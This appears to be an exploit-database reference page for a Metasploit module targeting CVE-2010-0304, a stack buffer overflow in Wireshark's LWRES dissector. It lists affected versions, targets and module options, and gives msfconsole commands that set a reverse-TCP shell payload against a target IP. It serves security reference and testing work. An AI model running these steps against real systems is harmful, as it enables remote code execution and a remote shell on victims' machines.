Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
The LWRES dissector in Wireshark versions 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug was found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function; several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method; however, such a packet will usually get fragmented, which may cause additional complications.
NOTE: The vulnerable code is reached only when the packet dissection is rendered. If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue.
Exploit Rank
- Great
Exploit Authors
- babi
- jduck < jduck [at] metasploit.com >
- redsand
Vulnerability References
- CVE-2010-0304
- OSVDB-61987
- BID-37985
- http://www.wireshark.org/security/wnpa-sec-2010-02.html
- http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?...
Exploit Targets
- 0 - tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)
- 1 - wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)
- 2 - wireshark 1.2.5 on RHEL 5.4 (x64)
- 3 - wireshark 1.2.5 on Mac OS X 10.5 (x86)
- 4 - wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86)
Exploit Development
Similar Exploit Modules
- exploit/multi/misc/batik_svg_java
- exploit/multi/misc/hp_vsa_exec
- exploit/multi/misc/java_rmi_server
- exploit/multi/misc/openview_omniback_exec
- exploit/multi/misc/veritas_netbackup_cmdexec
- exploit/multi/misc/wireshark_lwres_getaddrbyname_loop
- exploit/multi/misc/zend_java_bridge
Exploit Usage Information
msf > use exploit/multi/misc/wireshark_lwres_getaddrbyname
msf exploit(wireshark_lwres_getaddrbyname) > show payloads
msf exploit(wireshark_lwres_getaddrbyname) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(wireshark_lwres_getaddrbyname) > set LHOST [MY IP ADDRESS]
msf exploit(wireshark_lwres_getaddrbyname) > set RHOST [TARGET IP]
msf exploit(wireshark_lwres_getaddrbyname) > show targets
msf exploit(wireshark_lwres_getaddrbyname) > set TARGET [TARGET ID]
msf exploit(wireshark_lwres_getaddrbyname) > exploit
Exploit Module Options
| Option | Description |
|---|---|
| INTERFACE | The name of the interface |
| RHOST | The target address |
| RPORT | The target port (default: 921) |
| SHOST | This option can be used to specify a spoofed source address |
| SNAPLEN | The number of bytes to capture (default: 65535) |
| TIMEOUT | The number of seconds to wait for new data (default: 500) |
| CHOST | The local client address |
| CPORT | The local client port |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| DynamicSehRecord | Generate a dynamic SEH record (more stealthy) |
| EnableContextEncoding | Use transient context when encoding payloads |
| GATEWAY | The gateway IP address. This will be used rather than a random remote address for the UDP probe, if set. |
| NETMASK | The local network mask. This is used to decide if an address is in the local network. |
| UDP_SECRET | The 32-bit cookie for UDP probe requests. |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
